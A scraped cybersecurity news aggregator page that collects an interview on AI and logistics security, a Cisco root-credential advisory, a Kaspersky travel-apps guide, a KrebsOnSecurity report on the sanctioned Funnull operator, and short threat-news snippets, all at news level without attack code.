Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for Dhruvil Sanghvi on W ...

 Features

In a world where your next-day delivery could hinge on lines of code and machine learning algorithms, logistics is no longer just about moving goods, it’s about moving data securely. The global supply chain has become both a marvel of AI-powered efficiency and a high-value target for cybercriminals.  In 2024 alone,   show more ...

over 183,000 customers were affected by supply chain cyberattacks worldwide, a sharp contrast from the staggering 263 million impacted in 2019, yet still a sobering reminder that cyber threats are evolving, not disappearing. From counterfeiting to malware infections and drive-by compromises, the logistics sector has become a digital battlefield.  Meanwhile, AI’s footprint is growing fast, the cargo drone market alone is projected to hit $17.88 billion by 2030, fueled by AI’s promise of faster, smarter, and more autonomous delivery systems. But this raises a critical question: Will AI drive the next wave of innovation in logistics, or open new doors for cyber threats to exploit?  To learn more about this evolving landscape, The Cyber Express sat down with Dhruvil Sanghvi, Founder and CEO of LogiNext, a global leader in AI-driven logistics automation. In this wide-ranging conversation, Sanghvi delves into emerging cyber risks, why automation must be built with security at its core, and how different regions are tackling the cybersecurity puzzle in their own unique ways.  The Rise of AI and the Growing Threat Landscape  With the rapid adoption of AI in logistics, one might assume that technology is the answer to most operational problems. However, Sanghvi offers a measured perspective.  "The more interconnected and intelligent supply chains become, the more vulnerable they are to attack vectors that exploit those very integrations," he says.  I see the highest risks in API vulnerabilities, unsecured IoT devices across fleet networks, and AI models being fed malicious or manipulated data. Threat actors no longer just target servers, they aim for the data pipelines and learning systems themselves."  Indeed, as companies push for seamless data flows, faster decision-making, and end-to-end visibility, every integration becomes a potential point of entry for cybercriminals.  Building Security into Automation  Automation is now table stakes in logistics. From warehouse robotics to predictive route planning, the industry thrives on operational speed. But what happens when security takes a backseat?  "Efficiency and security aren't mutually exclusive, they must be engineered together," Sanghvi insists. "At LogiNext, we’ve built automation workflows that are permission-controlled and fully auditable. Automation without guardrails leads to incidents like the 2017 Maersk ransomware attack, which paralyzed global shipping. We believe automation should accelerate compliance, not bypass it."  This philosophy of "secure automation" is gradually being adopted across the logistics landscape. Companies are increasingly embedding cybersecurity principles into their DevOps pipelines, ensuring that automation doesn’t equate to exposure.  AI in Threat Detection: Early Radar, Not Autopilot  The cybersecurity community has been abuzz with the potential of AI to detect and mitigate threats before they escalate. But can AI be trusted as the first, and only, line of defense?  AI is essential for real-time anomaly detection and predictive threat intelligence," says Sanghvi.   "While traditional systems wait for a signature, AI can detect patterns and proactively raise red flags. That said, it’s not yet mature enough to act without human validation in high-stakes environments. We see AI as the early-warning radar; human judgment is still the command center."  AI's strength lies in its ability to parse enormous volumes of data and identify unusual behavior patterns that traditional tools often miss. But over-reliance without proper oversight could lead to false positives, or worse, missed attacks.  One Size Doesn’t Fit All  Operating across the US, UAE, and India, LogiNext has a global footprint, which gives Sanghvi a unique lens on how cybersecurity threats, and responses, differ across borders.  "In the US, the emphasis is on regulatory compliance: SOC2, ISO/IEC 27001, CCPA," he explains. "In the UAE, there’s a stronger focus on infrastructure control and national security. In India, the challenge is scale: protecting millions of endpoints at low cost. Each region requires a tailored strategy, but one thing remains universal: ransomware doesn’t respect borders."  This underlines the importance of localized cyber strategies that account for not just the technological landscape, but also regulatory frameworks and threat actor behaviors.  Data Protection in the Logistics Sector  “Data is the new oil” has become a truism in technology circles, but nowhere is it more evident than in logistics. Route data, customer information, delivery schedules, and warehouse analytics—all of it is prime target material.  "Encryption (in transit and at rest) is table stakes. Role-based access, frequent token refreshes, and audit logs are the next layers," Sanghvi explains. "At LogiNext, we also leverage anomaly detection algorithms that monitor abnormal location pings or route deviations."  These protocols have paid off. "Our platform has maintained a 99.96% uptime on web apps and a 99.67% crash-free rate on mobile—proof that stability and security can go hand in hand," he adds.  Business Continuity in the Face of Cyber Disruption  Cyberattacks on logistics firms don’t just affect one company, they ripple across industries. A delay in the delivery of semiconductors or medical supplies can have wide-reaching consequences.  "Redundancy across infrastructure, distributed data centers, and zero-trust frameworks are non-negotiable," says Sanghvi. "The 2025 Oracle Clouds’ security breach reminded the industry that centralized failures hurt everyone in the supply chain. At LogiNext, we’ve architected our systems for high availability across regions with real-time failover and backup strategies. We simulate attack scenarios regularly to pressure-test our preparedness."  The lesson is clear: resilience needs to be proactive, not reactive.  Cybersecurity and Startups: Still an Afterthought?  As an investor and mentor to several tech startups, Sanghvi has seen how early-stage companies often neglect cybersecurity.  "Unfortunately, many still see it as a Series B problem rather than a seed-stage priority. Founders must internalize that every line of code is a potential vulnerability," he warns. "The best teams I’ve worked with are the ones who integrate security reviews into CI/CD and think about threat modeling even before launch."  The shift toward “security-first startups” is slow, but vital, especially as more tech disruptors enter sensitive sectors like logistics, healthcare, and finance.  Closing the Gap Between Innovation and Enforcement  Is the regulatory environment keeping pace with the rapid innovation in AI and logistics tech?  "Regulations are catching up, but innovation still outpaces enforcement," Sanghvi observes.   "What’s encouraging is the global shift toward data localization and mandatory breach disclosures. However, unless regulators work more closely with tech providers on standards, as aviation does with aircraft safety—we’ll always be reacting to the last breach, not preventing the next."  It's a call for collaborative regulation, where lawmakers and technologists co-design frameworks that anticipate risk rather than just respond to it.  The Blind Spot in Cyber Strategies  When asked about the most common mistake startups make, Sanghvi doesn't hesitate: "They underestimate insider threats and over-focus on perimeter security. Access logs, permission hygiene, and behavioral monitoring are often ignored. And when startups do get breached, they lack a clear incident response plan, making recovery slower and costlier."  Organizations must broaden their threat models to account for not just outside hackers, but also internal actors with privileged access.  Best Practices from Around the World  Having worked across continents, Sanghvi believes that some regions have lessons to offer others.  "The US culture of ‘security by design’ needs to be adopted more broadly. In India and the UAE, security is often retrofitted. Starting from secure architecture rather than patching it later makes systems more resilient. That mindset shift alone could prevent a significant chunk of vulnerabilities."  Security as a Foundation, Not a Feature  When asked about his "aha" moment regarding cybersecurity, Sanghvi’s answer is revealing.  "Honestly, we never had an 'aha' moment. Security has always been a core principle at LogiNext since day one. In logistics, where systems are deeply interconnected and operate in real-time, we’ve always believed that even a minor breach can have outsized consequences."  He adds, "High-profile incidents like the 2025 BlueYonder outage have only reinforced our conviction. Watching companies suffer ripple effects across industries due to avoidable security lapses validates the path we’ve taken, building with security as a foundation, not an afterthought."  Autonomous AI Agents  Outside of corporate strategy, what tech is Dhruvil personally excited about? His answer reflects both enthusiasm and vision.  "I’m deeply excited about the rise of autonomous AI agents, especially their potential in operationalizing complex workflows without human intervention," he says. "Tools like AutoGPT, Devin, and emerging enterprise-grade agents are redefining how we think about task delegation."  He continues, "Imagine a logistics coordinator that never sleeps, learns from every delivery exception, and autonomously re-optimizes routes in real-time across cities. That’s no longer science fiction."  Conclusion  The integration of AI in logistics is no longer a futuristic concept, it’s today’s reality. From autonomous drones to real-time tracking, AI is powering an industry that once ran on paper trails and manual schedules. But as the sector races toward automation, it must also confront an uncomfortable truth: innovation is outpacing security.  In 2023 alone, the FBI logged nearly 300,000 phishing incidents in the U.S., while tools like WormGPT have emerged as dark web alternatives capable of crafting highly convincing, malicious content. In logistics, these technologies pose real risks, not just to backend systems but to the very customers companies aim to serve. The ability of drones to record and transmit footage wirelessly, for instance, introduces new surveillance risks that few have begun to address seriously.  And the issue isn’t just about breaches or bots. It’s also about trust and experience. In the U.S., more than 40% of consumers reported dissatisfaction when interacting with AI-powered customer service tools. This suggests that while AI can mimic conversation, it hasn’t mastered context or empathy, both essential in high-pressure logistics scenarios where every delayed shipment or rerouted package can trigger a ripple effect.  To its credit, the industry isn’t standing still. We are beginning to see more holistic strategies, including threat modeling for AI systems, real-time anomaly detection, and regulatory frameworks aimed at closing the security gap. But these responses still feel fragmented and reactive. For a sector that operates 24/7 and spans continents, that’s not good enough.  As Dhruvil Sanghvi aptly pointed out, cybersecurity in logistics can’t be an afterthought. It needs to be designed into the system, not duct-taped on after a breach. And that mindset shift has to happen now, not when the next high-profile attack makes headlines.  AI will undoubtedly remain central to the future of logistics. But the question isn't just what it can do—it's how safely it can do it. Because when automation fails, it’s not just code that crashes—it’s confidence, continuity, and sometimes even commerce.  In the race toward a smarter supply chain, speed and security must run side by side. Anything less is a risk the industry can’t afford. 

image for Cisco Issues Urgent ...

 Firewall Daily

Cisco has issued a new security advisory addressing a severe vulnerability in its Unified Communications Manager (Unified CM) and Unified Communications Manager Session Management Edition (Unified CM SME). The flaw, now identified as CVE-2025-20309, carries the highest possible CVSS score of 10.0. This Cisco   show more ...

vulnerability stems from static root account credentials embedded during the development phase, which were never removed or secured prior to product release. According to Cisco's advisory, the root credentials are immutable, meaning administrators cannot change or delete them, leaving the systems vulnerable to unauthenticated, remote attackers. “This vulnerability is due to the presence of static user credentials for the root account that are reserved for use during development,” the advisory noted. How the CVE-2025-20309 Vulnerability Works  An attacker could leverage CVE-2025-20309 to remotely log in as the root user without any authentication. Once inside, they gain unrestricted access, allowing them to execute arbitrary commands with full system privileges. The threat applies regardless of device configuration if the affected software version is in use.  The flaw was identified during internal security testing and not through a public exploit, and Cisco’s Product Security Incident Response Team (PSIRT) has stated that, as of the advisory release, there is no evidence of active exploitation in the wild. Affected Versions and Patch Details  The issue affects specific Engineering Special (ES) releases of Unified CM and Unified CM SME:  Versions 15.0.1.13010-1 through 15.0.1.13017-1 are confirmed vulnerable.  Only these ES releases, which are distributed through Cisco’s Technical Assistance Center (TAC), are impacted.  Cisco versions 12.5 and 14 are not affected by this vulnerability.  The first fixed release is 15SU3, available in July 2025, or users may apply the patch file: ciscocm.CSCwp27755_D0247-1.cop.sha512.  Cisco has not provided any workarounds, urging users to apply the patch or upgrade to the secure version immediately. The advisory clearly states that there are no mitigations other than upgrading.  Conclusion  The CVE-2025-20309 Cisco vulnerability highlights the serious security risks of leaving development-stage credentials in production environments. With no available workaround and the potential for attackers to gain full root access, Cisco strongly advises all users of Unified CM and Unified CM SME to apply the latest updates without delay.   Organizations should promptly verify their software versions, review SSH logs for signs of unauthorized root access, and upgrade to version 15SU3 or the appropriate patch. While no active exploitation has been reported, the critical nature and ease of exploitation make this vulnerability an urgent priority for IT and security teams across all sectors relying on Cisco’s communication systems. 

image for Best travel apps: ma ...

 Tips

Summer is in full swing, and that means one thing — its time to travel! Remember how people used to prepare for trips? Buying pocket guidebooks and phrasebooks, bombarding all our well-traveled friends with questions: What should I see?, How much do tours cost?, And how do I get a SIM card?. These days, the world   show more ...

has changed. You can plan a comfortable trip while lounging on your sofa with a smartphone in hand — or even while waiting at the airport gate. All you need do is download the right apps. In this guide, well help you prep both yourself and your phone for your journey: How to find your bearings in a new place? How to stay connected? How to get around comfortably? How to enjoy the city like a local? How to find good food? How to travel safely? How to find your bearings in a new place? Sure, you could buy a paper map in advance, but its much easier to download a few mapping apps. Yes, a few — dont rely on just one. Google Maps. An absolute must-have for any traveler. Plan routes and find nearby hotels, cafes, currency exchanges, and attractions. Read folks reviews for insider knowledge on the best spots (and the ones to avoid). Google Maps is every travelers digital Swiss Army knife — useful for a ton of different things (as long as youve downloaded offline maps in advance or have an internet connection). Organic Maps. If youre going somewhere beyond the reach of mobile networks, offline maps are your best bet. You can download a detailed map of your destination before your trip. It includes everything youd find in Google Maps — restaurants, shops, transport stops — just without user ratings and reviews. One standout feature is route planning for walking, biking, and hiking. You can even switch to a topographic view to see elevation changes — great for mountainous terrain or outdoor adventures. Guru Maps. Among tourists, this app is known as the king of navigation — and for good reason. With Guru Maps you can venture far off the grid without getting lost. Its made for finding hiking trails, routes through the wilderness, even swamp-trekking — perfect for when Google Maps and Organic Maps find no route at all. Like the other two, Guru Maps is free to use, but theres also a paid Pro version. This lets you download unlimited maps and create enough pins and GPS tracks for even the most hardcore traveler. How to stay connected? Offline apps are great, but pre-downloaded information alone isnt always enough. Especially in big cities, its essential to stay online. There are a few ways to do this. eSIM. Get a local SIM card, or better yet, an eSIM. You can use the Kaspersky eSIM Store app to find and activate affordable local data plans — no roaming fees or plastic SIM cards needed. Its simple: install Kaspersky eSIM Store, choose your destination, and buy a data plan that suits your needs. Along with the data package, youll receive your free eSIM — simply install it in your device in a couple of clicks. Later you can top up your eSIM for the same or different destinations with more great plans from local operators. And youre not limited to just one country at a time — if youre traveling across several countries, choose a regional plan or even get global coverage in 122 countries for constant connection. eSIMs from Kaspersky eSIM Store dont include a phone number — they only support data transfer. But your regular SIM stays in your device, so you can still receive texts and calls. Of course, you dont need to answer roaming calls — but you can see who contacted you and respond via messenger using your eSIM data. The cool thing is that you can set up eSIMs in advance, including the date your data plan will activate. Kaspersky eSIM Store offers both expiring plans (valid for 30 days in most countries) and non-expiring ones where unused gigabytes are saved for your next trip. eSIMs and related services are provided by our tech partner BNESIM Limited. For more on all the benefits of eSIMs, check out our blog post: Internet on the go with Kaspersky eSIM Store Mobile operator app. If you still plan to use roaming from your usual operator, be sure to install their app to monitor your data use, enable roaming options, and top up. However, theres a downside here: roaming usually costs much more than using an eSIM from Kaspersky eSIM Store. Yes, some providers offer special plans like unlimited messaging or map access, but relying on them could backfire in a crucial moment. For example, what if youre in a small town where Google Maps timetables for public transportation arent up to date? Youll need to look for an alternative transport app or take a completely different route. That could mean using a search engine — which can be painfully expensive on roaming data. How to get around comfortably? This is where specialized apps come to the rescue — reliable in big cities and helpful even in small towns where you could otherwise get stuck. Moovit. An app to help you navigate public transport almost anywhere in the world. It sources real-time data from transport providers — including private companies — so seasoned travelers trust Moovit in cities with a well-developed public transit system. But dont expect it to tell you exactly when a local bus is going to arrive in a tiny remote village. In such cases, its best to rely on taxis. Uber. If youve ever taken a taxi, theres a good chance you already have Uber on your phone. Its one of the worlds biggest ride-hailing platforms: just enter your destination, choose a rate, and wait for your driver. Simple and intuitive — but theres a catch: Uber isnt available everywhere. Youll have no trouble getting a ride in North America, Europe, and parts of Asia, but elsewhere your best bet is often a local taxi app. Yandex Go. Great for rides in Russia, Georgia, Kazakhstan, Belarus, Moldova, Armenia, Kyrgyzstan, Lithuania, Serbia, and Uzbekistan. DiDi. Use this app in China, Argentina, Australia, Brazil, Chile, Colombia, Costa Rica, Ecuador, Egypt, Japan, Mexico, New Zealand, Panama, Peru, and the Dominican Republic. Grab. The go-to ride-hailing app for Southeast Asia: Singapore, Cambodia, Myanmar, Malaysia, the Philippines, Thailand, Vietnam, and Indonesia. Careem. Ideal for travel in Egypt, Bahrain, Iraq, Jordan, Pakistan, Saudi Arabia, Kuwait, Morocco, and the UAE. Bonus: InDrive is a unique app that lets you name your price for a ride and choose a driver. Available in 48 countries. How to enjoy a city like a local? Sometimes you only have a few hours or a couple of days to explore a huge city. So how do you quickly decide what to see and where to go? Previously, you could find such answers on Foursquare — but what now? Visit a City. According to its developers, this app covers more than 3000 cities worldwide. Choose free mini-guides, buy tickets to museums and attractions, or book tours. With just a few clicks, you can plan a trip — say, two days in Istanbul — and get a detailed itinerary down to the minute. Many major cities now offer their own travel apps — so check those out too. For a Thames-side stroll, try Visit London; if its mosques and markets youre after, check Istanbul Tourist Pass; and if youve always dreamed of seeing Park Güell, use Hola Barcelona. ChatGPT. Yes, artificial intelligence can help here too, creating an itinerary for any city on Earth and offering it in a neat PDF or spreadsheet. Just bear in mind that AI cant always account for real-world factors like traffic or opening hours — things that are kept up-to-date by real people in specialized apps like Visit a City. But for general plans, ChatGPT works wonderfully. Just tell it something like, Plan a 2-day trip to Istanbul for two people in their 30s. The pace should be relaxed and must include Galata Tower, a San Sebastián cheesecake stop, and a Bosphorus cruise. Break it down by time, considering traffic. How to find good food? If youre just looking for a quick bite while exploring, Google Maps or any other map app will do the trick — as long as youve got an internet connection, youll see nearby food options in seconds. But if youre after something more authentic or sophisticated, there are dedicated apps for that. The MICHELIN Guide. Not sure where to eat and want a guaranteed good spot? Pick any restaurant in this guide — and you can even book a table right in the app. A common myth is that Michelin is only for expensive fine dining, but thats not true anymore: today the guide includes plenty of local gems with reasonable prices and great service. So whether youre a foodie or just want a reliable recommendation, the MICHELIN Guide has something for every budget. TheFork. This popular app makes sure no tourist goes hungry — at least in Europe. Its packed with everything you need: addresses, menus, cuisine types, food photos, average prices, real reviews, and the ability to book a table directly. Sounds ideal, but as usual theres a catch: TheFork only works in certain major European cities — for now: Paris, Amsterdam, Barcelona, Lisbon, Madrid, Milan, Rome, Geneva, Brussels, Stockholm, Marseille, and Bordeaux. Local apps. Just like with taxis, every country — or even every city — tends to have its own version of TheFork. So its worth doing a little research to see what app is popular at your destination. For example, in the United States, youll want Resy and Yelp, while in China, Dianping is the go-to (if your Chinese is ok: its only available in Chinese). Bonus: Flush Toilet Finder. This handy app helps you locate public toilets all over the world — a perfect companion to your restaurant guide. While general maps might also show toilet locations, Flush Toilet Finder provides extra details such as wheelchair accessibility, whether access codes or keys are required, and how much it costs. How to travel safely? Connecting to the first open Wi-Fi spot you find is not a great idea — and neither is storing a passport scan in your photo gallery. Heres how to add a dash of digital safety to your perfect trip mix: Obsidian. Youll probably want to plan your trip in advance — and most likely, youll try to do so using the standard Notes app on your phone. Thats not the safest option, and sometimes not the most convenient either when it comes to storing important information. Consider Obsidian — it protects your notes with end-to-end encryption and syncs them across your devices. But there are other similar apps out there, which we wrote about in our article Keep it under wraps: encrypted note-taking apps and to-do lists. Kaspersky Password Manager. Store photos or PDFs of your passports, tickets, vouchers, and other important documents in secure storage — they can only be decrypted and viewed after entering a main password that only you know. At the same time, you can easily add or open any document on any device — the app is cross-platform and constantly syncs information between your smartphone and computer. In addition, our password manager can store two-factor authentication tokens. Remember that traditional one-time passwords may not arrive via SMS while roaming, or they may be severely delayed. Take a couple of minutes at home to configure your frequently used apps and websites so that 2FA codes are generated in Kaspersky Password Manager instead of being sent via SMS. Kaspersky VPN Secure Connection. If youll be connecting to unfamiliar Wi-Fi networks often during your trip, your best bet is to protect your connection. You can do this with the help of one of the fastest VPNs in the world. Plus, VPN also lets you change your phones location in advance — so your search results become local! That way, even from home, you can plan visits to the events that locals actually go to, not just tourist traps. Wherever youre going, remember — happiness is only real when shared. Stay connected with Kaspersky eSIM Store and share your favorite travel moments with your loved ones. What else to read before your trip: How to travel safely Internet on the go with Kaspersky eSIM Store Fake Wi-Fi on board a flight Going on vacation? Beware of scammers Four ways to find spy cameras

image for Big Tech’s Mixed R ...

 A Little Sunshine

In May 2025, the U.S. government sanctioned a Chinese national for operating a cloud provider linked to the majority of virtual currency investment scam websites reported to the FBI. But a new report finds the accused continues to operate a slew of established accounts at American tech companies — including   show more ...

Facebook, Github, PayPal and Twitter/X. On May 29, the U.S. Department of the Treasury announced economic sanctions against Funnull Technology Inc., a Philippines-based company alleged to provide infrastructure for hundreds of thousands of websites involved in virtual currency investment scams known as “pig butchering.” In January 2025, KrebsOnSecurity detailed how Funnull was designed as a content delivery network that catered to foreign cybercriminals seeking to route their traffic through U.S.-based cloud providers. The Treasury also sanctioned Funnull’s alleged operator, a 40-year-old Chinese national named Liu “Steve” Lizhi. The government says Funnull directly facilitated financial schemes resulting in more than $200 million in financial losses by Americans, and that the company’s operations were linked to the majority of pig butchering scams reported to the FBI. It is generally illegal for U.S. companies or individuals to transact with people sanctioned by the Treasury. However, as Mr. Lizhi’s case makes clear, just because someone is sanctioned doesn’t necessarily mean big tech companies are going to suspend their online accounts. The government says Lizhi was born November 13, 1984, and used the nicknames “XXL4” and “Nice Lizhi.” Nevertheless, Steve Liu’s 17-year-old account on LinkedIn (in the name “Liulizhi”) had hundreds of followers (Lizhi’s LinkedIn profile helpfully confirms his birthday) until quite recently: The account was deleted this morning, just hours after KrebsOnSecurity sought comment from LinkedIn. Mr. Lizhi’s LinkedIn account was suspended sometime in the last 24 hours, after KrebsOnSecurity sought comment from LinkedIn. In an emailed response, a LinkedIn spokesperson said the company’s “Prohibited countries policy” states that LinkedIn “does not sell, license, support or otherwise make available its Premium accounts or other paid products and services to individuals and companies sanctioned by the U.S. government.” LinkedIn declined to say whether the profile in question was a premium or free account. Mr. Lizhi also maintains a working PayPal account under the name Liu Lizhi and username “@nicelizhi,” another nickname listed in the Treasury sanctions. PayPal did not respond to a request for comment. A 15-year-old Twitter/X account named “Lizhi” that links to Mr. Lizhi’s personal domain remains active, although it has few followers and hasn’t posted in years. These accounts and many others were flagged by the security firm Silent Push, which has been tracking Funnull’s operations for the past year and calling out U.S. cloud providers like Amazon and Microsoft for failing to more quickly sever ties with the company. Liu Lizhi’s PayPal account. In a report released today, Silent Push found Lizhi still operates numerous Facebook accounts and groups, including a private Facebook account under the name Liu Lizhi. Another Facebook account clearly connected to Lizhi is a tourism page for Ganzhou, China called “EnjoyGanzhou” that was named in the Treasury Department sanctions. “This guy is the technical administrator for the infrastructure that is hosting a majority of scams targeting people in the United States, and hundreds of millions have been lost based on the websites he’s been hosting,” said Zach Edwards, senior threat researcher at Silent Push. “It’s crazy that the vast majority of big tech companies haven’t done anything to cut ties with this guy.” The FBI says it received nearly 150,000 complaints last year involving digital assets and $9.3 billion in losses — a 66 percent increase from the previous year. Investment scams were the top crypto-related crimes reported, with $5.8 billion in losses. In a statement, a Meta spokesperson said the company continuously takes steps to meet its legal obligations, but that sanctions laws are complex and varied. They explained that sanctions are often targeted in nature and don’t always prohibit people from having a presence on its platform. Nevertheless, Meta confirmed it had removed the account, unpublished Pages, and removed Groups and events associated with the user for violating its policies. Attempts to reach Mr. Lizhi via his primary email addresses at Hotmail and Gmail bounced as undeliverable. Likewise, his 14-year-old YouTube channel appears to have been taken down recently. However, anyone interested in viewing or using Mr. Lizhi’s 146 computer code repositories will have no problem finding GitHub accounts for him, including one registered under the NiceLizhi and XXL4 nicknames mentioned in the Treasury sanctions. One of multiple GitHub profiles used by Liu “Steve” Lizhi, who uses the nickname XXL4 (a moniker listed in the Treasury sanctions for Mr. Lizhi). Mr. Lizhi also operates a GitHub page for an open source e-commerce platform called NexaMerchant, which advertises itself as a payment gateway working with numerous American financial institutions. Interestingly, this profile’s “followers” page shows several other accounts that appear to be Mr. Lizhi’s. All of the account’s followers are tagged as “suspended,” even though that suspended message does not display when one visits those individual profiles. In response to questions, GitHub said it has a process in place to identify when users and customers are Specially Designated Nationals or other denied or blocked parties, but that it locks those accounts instead of removing them. According to its policy, GitHub takes care that users and customers aren’t impacted beyond what is required by law. All of the follower accounts for the XXL4 GitHub account appear to be Mr. Lizhi’s, and have been suspended by GitHub, but their code is still accessible. “This includes keeping public repositories, including those for open source projects, available and accessible to support personal communications involving developers in sanctioned regions,” the policy states. “This also means GitHub will advocate for developers in sanctioned regions to enjoy greater access to the platform and full access to the global open source community.” Edwards said it’s great that GitHub has a process for handling sanctioned accounts, but that the process doesn’t seem to communicate risk in a transparent way, noting that the only indicator on the locked accounts is the message, “This repository has been archived by the owner. It is not read-only.” “It’s an odd message that doesn’t communicate, ‘This is a sanctioned entity, don’t fork this code or use it in a production environment’,” Edwards said. Mark Rasch is a former federal cybercrime prosecutor who now serves as counsel for the New York City based security consulting firm Unit 221B. Rasch said when Treasury’s Office of Foreign Assets Control (OFAC) sanctions a person or entity, it then becomes illegal for businesses or organizations to transact with the sanctioned party. Rasch said financial institutions have very mature systems for severing accounts tied to people who become subject to OFAC sanctions, but that tech companies may be far less proactive — particularly with free accounts. “Banks have established ways of checking [U.S. government sanctions lists] for sanctioned entities, but tech companies don’t necessarily do a good job with that, especially for services that you can just click and sign up for,” Rasch said. “It’s potentially a risk and liability for the tech companies involved, but only to the extent OFAC is willing to enforce it.” Liu Lizhi operates numerous Facebook accounts and groups, including this one for an entity specified in the OFAC sanctions: The “Enjoy Ganzhou” tourism page for Ganzhou, China. Image: Silent Push. In July 2024, Funnull purchased the domain polyfill[.]io, the longtime home of a legitimate open source project that allowed websites to ensure that devices using legacy browsers could still render content in newer formats. After the Polyfill domain changed hands, at least 384,000 websites were caught in a supply-chain attack that redirected visitors to malicious sites. According to the Treasury, Funnull used the code to redirect people to scam websites and online gambling sites, some of which were linked to Chinese criminal money laundering operations. The U.S. government says Funnull provides domain names for websites on its purchased IP addresses, using domain generation algorithms (DGAs) — programs that generate large numbers of similar but unique names for websites — and that it sells web design templates to cybercriminals. “These services not only make it easier for cybercriminals to impersonate trusted brands when creating scam websites, but also allow them to quickly change to different domain names and IP addresses when legitimate providers attempt to take the websites down,” reads a Treasury statement. Meanwhile, Funnull appears to be morphing nearly all aspects of its business in the wake of the sanctions, Edwards said. “Whereas before they might have used 60 DGA domains to hide and bounce their traffic, we’re seeing far more now,” he said. “They’re trying to make their infrastructure harder to track and more complicated, so for now they’re not going away but more just changing what they’re doing. And a lot more organizations should be holding their feet to the fire.” Update, 2:48 PM ET: Added response from Meta, which confirmed it has closed the accounts and groups connected to Mr. Lizhi.

 Feed

Cisco has released security updates to address a maximum-severity security flaw in Unified Communications Manager (Unified CM) and Unified Communications Manager Session Management Edition (Unified CM SME) that could permit an attacker to login to a susceptible device as the root user, allowing them to gain elevated privileges. The vulnerability, tracked as CVE-2025-20309, carries a CVSS score

 Feed

Cybersecurity researchers have uncovered over 40 malicious browser extensions for Mozilla Firefox that are designed to steal cryptocurrency wallet secrets, putting users' digital assets at risk. "These extensions impersonate legitimate wallet tools from widely-used platforms such as Coinbase, MetaMask, Trust Wallet, Phantom, Exodus, OKX, Keplr, MyMonero, Bitget, Leap, Ethereum Wallet, and Filfox

 Feed

If you’re evaluating AI-powered SOC platforms, you’ve likely seen bold claims: faster triage, smarter remediation, and less noise. But under the hood, not all AI is created equal. Many solutions rely on pre-trained AI models that are hardwired for a handful of specific use cases. While that might work for yesterday’s SOC, today's reality is different. Modern security operations teams face a

 Feed

The French cybersecurity agency on Tuesday revealed that a number of entities spanning governmental, telecommunications, media, finance, and transport sectors in the country were impacted by a malicious campaign undertaken by a Chinese hacking group by weaponizing several zero-day vulnerabilities in Ivanti Cloud Services Appliance (CSA) devices. The campaign, detected at the beginning of

 Feed

A mobile ad fraud operation dubbed IconAds that consisted of 352 Android apps has been disrupted, according to a new report from HUMAN. The identified apps were designed to load out-of-context ads on a user's screen and hide their icons from the device home screen launcher, making it harder for victims to remove them, per the company's Satori Threat Intelligence and Research Team. The apps have

 Law & order

A Mexican drug cartel spies on the FBI using traffic cameras and spyware — because "ubiquitous technical surveillance” is no longer just for dystopian thrillers. Graham digs into a chilling new US Justice Department report that shows how surveillance tech was weaponised to deadly effect. Meanwhile, Carole   show more ...

checks the rear-view mirror on the driverless car industry. Whatever happened to those million Tesla robotaxis Elon Musk promised by 2020? Spoiler: they’re here — sort of — but they sometimes drive into oncoming traffic. Plus: Leighton House, heatwave survival gadgets, and an unflushable toilet situation (not what you think). All this and more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

 Cyber Security News

Source: thehackernews.com – Author: . Threat actors with ties to North Korea have been observed targeting Web3 and cryptocurrency-related businesses with malware written in the Nim programming language, underscoring a constant evolution of their tactics. “Unusually for macOS malware, the threat actors   show more ...

employ a process injection technique and remote communications via wss, the TLS-encrypted version […] La entrada North Korean Hackers Target Web3 with Nim Malware and Use ClickFix in BabyShark Campaign – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com – Author: . With nearly 80% of cyber threats now mimicking legitimate user behavior, how are top SOCs determining what’s legitimate traffic and what is potentially dangerous? Where do you turn when firewalls and endpoint detection and response (EDR) fall short at detecting the most   show more ...

important threats to your organization? Breaches at edge […] La entrada That Network Traffic Looks Legit, But it Could be Hiding a Serious Threat – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com – Author: . Cybersecurity researchers are calling attention to phishing campaigns that impersonate popular brands and trick targets into calling phone numbers operated by threat actors. “A significant portion of email threats with PDF payloads persuade victims to call   show more ...

adversary-controlled phone numbers, displaying another popular social engineering technique known as Telephone-Oriented Attack Delivery […] La entrada Hackers Using PDFs to Impersonate Microsoft, DocuSign, and More in Callback Phishing Campaigns – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 'Cyber

Source: sec.cloudapps.cisco.com – Author: . Cisco Spaces Connector Privilege Escalation Vulnerability Medium CVE-2025-20308 CWE-78 Download CSAF Email Summary A vulnerability in Cisco Spaces Connector could allow an authenticated, local attacker to elevate privileges and execute arbitrary commands on the   show more ...

underlying operating system as root. This vulnerability is due to insufficient restrictions during the execution of […] La entrada Cisco Spaces Connector Privilege Escalation Vulnerability – Source:sec.cloudapps.cisco.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 'Cyber

Source: sec.cloudapps.cisco.com – Author: . Cisco BroadWorks Application Delivery Platform Cross-Site Scripting Vulnerability Medium CVE-2025-20307 CWE-79 Download CSAF Email Summary A vulnerability in the web-based management interface of Cisco BroadWorks Application Delivery Platform could allow an   show more ...

authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. This vulnerability is due […] La entrada Cisco BroadWorks Application Delivery Platform Cross-Site Scripting Vulnerability – Source:sec.cloudapps.cisco.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

Source: www.mcafee.com – Author: Amy Bunn. Whether it tags along via a smartphone, laptop, tablet, or wearable, it seems like the internet follows us wherever we go nowadays. Yet there’s something else that follows us around as well — a growing body of personal info that we create while banking, shopping,   show more ...

and simply browsing the […] La entrada How to Protect Your Personal Info – Source:www.mcafee.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

Source: www.mcafee.com – Author: McAfee Labs. Authored by: M, Mohanasundaram and Neil Tyagi In today’s rapidly evolving cyber landscape, malware threats continue to adapt, employing new tactics and leveraging popular platforms to reach unsuspecting victims. One such emerging threat is the Lumma Stealer—a   show more ...

potent information-stealing malware recently gaining traction through Telegram channels. With Telegram’s popularity […] La entrada Lumma Stealer on the Rise: How Telegram Channels Are Fueling Malware Proliferation – Source:www.mcafee.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

